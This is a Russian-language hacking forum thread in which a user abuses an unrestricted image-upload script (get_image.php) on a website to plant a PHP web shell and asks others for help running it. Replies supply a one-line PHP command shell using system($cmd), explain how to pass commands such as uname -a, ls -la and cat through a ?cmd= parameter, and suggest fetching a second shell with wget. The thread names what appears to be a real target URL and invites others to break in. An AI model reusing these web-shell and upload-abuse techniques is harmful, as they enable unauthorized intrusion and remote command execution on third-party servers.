Зальем файлы на сайт через get_image.php
 

На сайте.. стоит get_image.php скриптик, который должен служить для заливки на сайт картинок.
Но он, также пропускает и все другие файлы..такие как php, html, и все остальное короче..

Залил я туда shell, но там пишут, что "Для выполнения оно должно иметь права 0755 ли 0711"
Хотя файлы с другим разрешением открываются.

Все файлы появляются в папке /www.site.ru/img/

Какие есть варианты? :)

залил.
После нажати я на кнопку добавить как и обычно вылелтел адресок куда все зелетело.
Выдалось http://..ru/img/1147031229.jpg
Нажимаю ничего не происходит..хотя через Ie он выдает текст shella
Что мне с ним делать?

Вот по хорошему его как нить залить в другую папку..через этот get_image.php
Какие мысли еще, народ?

Если нужно то могу этот исходничек get_image.php осветить.

Попробуй
http://site.ru/index.php?cmd="php shell.jpg"

Люди тут еще советуют:
Можно попробывать залить вот такую команду
<? system($cmd);?>
И потом через неё залить шелл другой который тебе нужен!
Может и не работать но попробуй!
Или добавить <? system($cmd); ?> в коментарий картинки авось выполниться!

А можно поподробнее, на счет залит эту команду..да и вообще сам процес что-то не пойму..

Это я предлогал но моё сообщение пропало куда то(
Вообщем команды там будут типа http://site.ru/img/fail.php?cmd= и тут команда типа uname -a воть а залить моно так ls -la

Ета команда показывает файлы в дире. А залить попробуй через "wget сцылка" но ето тока в том случае если есть права на запись

К сожалению или к счастью у меня нет огромного опыта в этих делах..дабы поэтому и спрашивал.
Можно мне написать подробно на счет fail.php?cmd=...(так как пока мне не покажешь..черт побери я так и не пойму..)
Заранее благодарен.
Я хотел бы научится, да вот только не знаю что да где..

djhoof статей по етомe поводу уйма почитай немного!!!
Куда уж подробней заливаеш пхп файл с ети <? system($cmd); ?> сожержимым допустим тот же fall.php. Дальше http://site.ru/img/fail.php?cmd=команда

нда я вижу вы богаты знаниями ))
Вообще то wget это для виндовс но если я с ls -la ошибся тогда cat 100% подходит!
А насчет file.php?cmd=
file.php твой файл
?cmd= запрос
Какие команды туда вводить? Смотря какая система если системы виндовс то некоторые команды можешь посмотреть в cmd> help если unix то поищи в google.ru !

Попробовал..опять пишет, что права нужны..
/img/1147031229.php?cmd=ls -la

Что там еще..

http://sait.ru/img/1147007150.php?cmd=uname -a
Так тоже не че не получается..

А на счет залить через "wget сцылка"
Я просто не понял.=)

Да уж куда мне до вас кул хацкеров )))))) типа на линухе wget нету да??

Парни..попробуйте че нить сделать
http://www.modnoblya.h15.ru/get_image.php
А то что то у меня голова от всего этого сейчас лопнет...
Этот сайт..просто ключик к другому..

Думаю совместными усилиями можно что-нить придумать..

Есть но там если не ошибаюсь ему замена команда CAT )

А потом расскажите как да что..просто сам тоже хочу попробовать..))
А то никакого удовольствия..)

неужели некому помочь?

Это по идеи работает, но к сожалению там вылетает такая вот надпись - The html tags you attempted to use are not allowed

Короче я беру shell.php в него вставляю эту строчку в самый верх <? system($cmd); ?>, так???
заливаю shell и пробую его открыть через http://site.ru/img/fail.php?cmd=команда
Что там за команды должны быть..

Я че то видимо отдален от всего этого..но мне все же интересно.

Когда заливаешь туда файл расширение сразу меняеться на gif. А ты запускаешь файл php. У тебя наверно не фига не получиться.

Такс..опять мне не понятно какой файл где там что меняется..=((
Может какой нить добрый чел покажет мне как это надо все правильно делать..
http://www.modnoblya.h15.ru/get_image.php - вот тут этот файл..блин..
Заранее благодарен.